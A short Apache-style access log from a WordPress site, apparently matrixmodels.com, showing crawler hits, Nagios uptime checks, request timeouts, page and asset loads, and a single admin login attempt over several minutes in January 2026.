46.105.42.135 - - [26/Jan/2026:13:16:29 -0500] "GET /robots.txt HTTP/1.1" 200 116 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
46.105.42.135 - - [26/Jan/2026:13:16:29 -0500] "GET /https-www-netflix-com-watch-80115908trackid13752289tctx0,2,1e4d6191-442a-4bbb-b824-80e2389da213-155638059,,/ HTTP/1.1" 200 9464 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
138.199.55.241 - - [26/Jan/2026:13:16:41 -0500] "-" 408 - "-" "-"
138.199.55.241 - - [26/Jan/2026:13:16:41 -0500] "-" 408 - "-" "-"
64.59.72.148 - - [26/Jan/2026:13:17:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
64.59.72.148 - - [26/Jan/2026:13:19:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
66.249.70.134 - - [26/Jan/2026:13:19:51 -0500] "GET /?p=4033 HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.59.72.148 - - [26/Jan/2026:13:21:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
63.69.91.99 - - [26/Jan/2026:13:21:33 -0500] "POST /wp-login.php HTTP/1.1" 200 7310 "http://matrixmodels.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
63.69.91.99 - - [26/Jan/2026:13:21:34 -0500] "GET /wp-admin/ HTTP/1.1" 302 - "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
63.69.91.99 - - [26/Jan/2026:13:21:34 -0500] "GET /wp-login.php?redirect_to=http%3A%2F%2Fmatrixmodels.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 6901 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
104.28.129.22 - - [26/Jan/2026:13:22:15 -0500] "GET / HTTP/1.1" 200 4446 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
104.28.129.22 - - [26/Jan/2026:13:22:15 -0500] "GET /wp-content/themes/matrix-model/assets/images/logo/favicon.png HTTP/1.1" 404 259 "-" "Client/65627 CFNetwork/3860.300.31 Darwin/25.2.0"
5.249.149.101 - - [26/Jan/2026:13:22:41 -0500] "GET / HTTP/1.1" 301 - "-" "Go-http-client/1.1"
5.249.149.101 - - [26/Jan/2026:13:22:42 -0500] "GET / HTTP/1.1" 200 4465 "https://74.206.165.146" "Go-http-client/1.1"
185.12.59.118 - - [26/Jan/2026:13:23:18 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
64.59.72.148 - - [26/Jan/2026:13:23:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
45.232.94.22 - - [26/Jan/2026:13:23:34 -0500] "GET /otw-portfolio/gabbie-carter/ HTTP/1.1" 301 - "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1"
45.232.94.22 - - [26/Jan/2026:13:23:34 -0500] "GET / HTTP/1.1" 200 4465 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1"
45.232.94.22 - - [26/Jan/2026:13:23:35 -0500] "GET /wp-content/themes/matrix-model/assets/css/bootstrap_v4.3.1_min.css HTTP/1.1" 200 155712 "https://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_6_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1"
